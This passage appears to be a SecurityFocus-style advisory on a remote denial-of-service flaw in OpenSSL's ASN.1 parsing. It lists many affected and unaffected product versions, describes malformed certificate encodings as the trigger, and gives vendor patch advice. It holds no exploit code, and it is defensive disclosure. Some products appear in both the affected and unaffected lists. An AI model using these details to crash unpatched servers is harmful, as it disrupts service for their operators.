+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ RedHat Linux Advanced Work Station 2.1
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Office Server
+ S.u.S.E. SuSE eMail Server III
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ SuSE SUSE Linux Enterprise Server 7
OpenSSL Project OpenSSL 0.9.6 a
+ Conectiva Linux 7.0
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ HP Secure OS software for Linux 1.0
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ NetBSD NetBSD 1.6 beta
+ NetBSD NetBSD 1.6
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSL Project OpenSSL 0.9.5 a
+ Debian Linux 3.0
+ HP Secure OS software for Linux 1.0
+ Immunix Immunix OS 7.0
+ Immunix Immunix OS 6.2
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 2.7
+ Red Hat Linux 6.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
OpenSSL Project OpenSSL 0.9.5
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
OpenSSL Project OpenSSL 0.9.4
+ Debian Linux 3.0
+ OpenBSD OpenBSD 2.6
OpenSSL Project OpenSSL 0.9.3
OpenSSL Project OpenSSL 0.9.2 b
OpenSSL Project OpenSSL 0.9.1 c
Novell NetMail 3.10 d
Novell NetMail 3.10 c
Novell NetMail 3.10 b
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.10 a
- Microsoft Windows 3.11
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Novell Netware 6.0 SP1
- Novell Netware 6.0
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.10
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
NetBSD NetBSD 1.6 beta
Juniper Networks SDX-300 3.1.1
Juniper Networks SDX-300 3.1
Juniper Networks JUNOS 5.6
Juniper Networks JUNOS 5.5
Juniper Networks JUNOS 5.4
Juniper Networks JUNOS 5.3
Juniper Networks JUNOS 5.2
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0
ISC BIND 9.1.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
ISC BIND 9.1.2
+ Conectiva Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
ISC BIND 9.1.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
ISC BIND 9.1
+ Caldera OpenUnix 8.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
IBM Linux Affinity Toolkit
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
HP Webproxy 2.0
+ HP HP-UX 11.0 4
HP Webproxy 1.0
HP VirtualVault 4.6
- HP HP-UX 11.0 4
HP VirtualVault 4.5
- HP HP-UX 11.0 4
HP Tru64 UNIX INTERNET EXPRESS 5.9
HP Tru64 UNIX Compaq Secure Web Server 5.8.1
HP TCP/IP Services for OpenVMS 5.3
HP Secure OS software for Linux 1.0
HP OpenVMS Secure Web Server 1.2
HP OpenVMS Secure Web Server 1.1 -1
HP OpenSSL for OpenVMS Alpha 1.0
HP INTERNET EXPRESS EAK 2.0
Apple Mac OS X Server 10.0
Apple Mac OS X 10.2
Apple Mac OS X 10.1.5
Apple Mac OS X 10.1.4
Apple Mac OS X 10.1.3
Apple Mac OS X 10.1.2
Apple Mac OS X 10.1.1
Apple Mac OS X 10.1
Apple Mac OS X 10.1
Apple Mac OS X 10.0.4
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.6 g
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ HP Apache-Based Web Server 2.0.43 .04
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Webmin-Based Admin 1.0 .01
+ Immunix Immunix OS 7+
+ NetBSD NetBSD 1.6
+ OpenPKG OpenPKG 1.1
OpenSSL Project OpenSSL 0.9.6 e
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
Novell NetMail 3.10 e
ISC BIND 9.2.2
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8

- Unaffected program versions

Opera Software Opera Web Browser 6.0.3 win32
Opera Software Opera Web Browser 6.0.3 linux
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.6 g
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ HP Apache-Based Web Server 2.0.43 .04
+ HP Apache-Based Web Server 2.0.43 .00
+ HP Webmin-Based Admin 1.0 .01
+ Immunix Immunix OS 7+
+ NetBSD NetBSD 1.6
+ OpenPKG OpenPKG 1.1
OpenSSL Project OpenSSL 0.9.6 e
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
Novell NetMail 3.10 e
ISC BIND 9.2.2
ISC BIND 9.2.1
+ Caldera OpenUnix 8.0
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ SCO Unixware 7.1.3
ISC BIND 9.2
+ Conectiva Linux 8.0
+ Conectiva Linux 8.0
+ HP HP-UX 11.11
+ HP HP-UX 11.11
+ HP HP-UX 11.0
+ HP HP-UX 11.0
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.3
HP Tru64 UNIX Compaq Secure Web Server 5.9.2
HP Tru64 UNIX Compaq Secure Web Server 5.9.1
HP Tru64 UNIX Compaq Secure Web Server 5.8.2
HP OpenSSL for OpenVMS Alpha 1.0 -A

- Vulnerability discussion

A remotely exploitable denial of service condition has been reported in the OpenSSL ASN.1 library. This vulnerability is due to parsing errors and affects SSL, TLS, S/MIME, PKCS#7 and certificate creation routines. In particular, malformed certificate encodings could cause a denial of service to server and client implementations which depend on OpenSSL.

- Exploit

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Solution

Users are strongly encouraged to upgrade existing versions of OpenSSL to version 0.9.6e or 0.9.7beta3.

Secure Computing has advised that customers using the SafeWord PremierAccess version 3.1 authentication system should download and apply PremierAccess Patch 1 as soon as possible.

Patches supplied by Vincent Danen have been reported to omit the ASN.1 fix. Updated patches have been supplied by Ademar de Souza Reis Jr. <ademar@conectiva.com.br>.

OpenLDAP Project uses OpenSSL. Users are advised to rebuild OpenLDAP with updated versions of OpenSSL to address this issue. Users implementing packaged versions of OpenLDAP are advised to contact the package distributor for update information.

Oracle suggests that this issue can be mitigated by disabling SSL support.

Oracle Patch 2492925 is scheduled to address vulnerable versions of iAS. A release schedule for various platforms is available.

Oracle CorporateTime Outlook Connector 3.3.1 and Oracle Outlook Connector 3.4 are scheduled for release on August 16, 2002, and will resolve these issues.

Users of HP Secure OS Software for Linux Release 1.0 are advised to install the RPMs issued by Red Hat. HP has also made their own patch available for HP Secure OS Software for Linux.

HP has released a bulletin regarding upgrades and workarounds for additional products affected by this issue. Users of TCP/IP Services for OpenVMS V5.3 are advised not to use any keying mechanisms (including tsig and dnssec), which may be done by editing the BIND configuration file TCPIP$BIND.CONF. Additional information regarding other products is available in the attached advisory (SSRT2310a). HP has also made fixes available in the form of upgrade packages. The packages, available at http://www.software.hp.com/ISS_products_list.html, are binary versions of Apache 1.3.26.05 and 2.0.39.05 respectively. Additional HP patches are available for Virtualvault and Webproxy (VVOS 11.04), which should be applied after updating Apache.

Conectiva has released a new advisory. Updated openssl packages are available that fix the ASN.1 parsing error. Further details are available in Conectiva Security Announcement CLA-2002:516. Users are urged to download and install the newer packages.

IBM has stated that OpenSSL is not included with AIX but is available via the Linux Affinity ToolKit. Fixed versions of OpenSSL are available for download at:

http://www6.software.ibm.com/dl/aixtbx/aixtbx-p

Apple has included a fix in Security Update 2002-08-20 for MacOS X 10.1.5. This fix contains an upgrade from OpenSSL 0.9.6b to 0.9.6e. Further details are available in the referenced Security Information page. Additionally, Apple has released Security Update 2002-08-23 to address Mac OS X 10.2 (Jaguar).

NetBSD has updated its advisory. In its earlier advisory, NetBSD had incorrect upgrading information for NetBSD 1.5. The advisory has been revised to include updated upgrading instructions for users of NetBSD 1.5. NetBSD 1.5 users are strongly urged to apply the new instructions when upgrading systems.

Opera has fixed this vulnerability in their browser with version 6.03.

FreeBSD has released upgrades. Users are advised to upgrade their Ports collection and reinstall the affected port.

Vendor updates are available:


IBM Linux Affinity Toolkit

OpenSSL Project OpenSSL 0.9.4

OpenSSL Project OpenSSL 0.9.5 a

OpenSSL Project OpenSSL 0.9.6 d

OpenSSL Project OpenSSL 0.9.6 c

OpenSSL Project OpenSSL 0.9.6 a

OpenSSL Project OpenSSL 0.9.6

- Related references
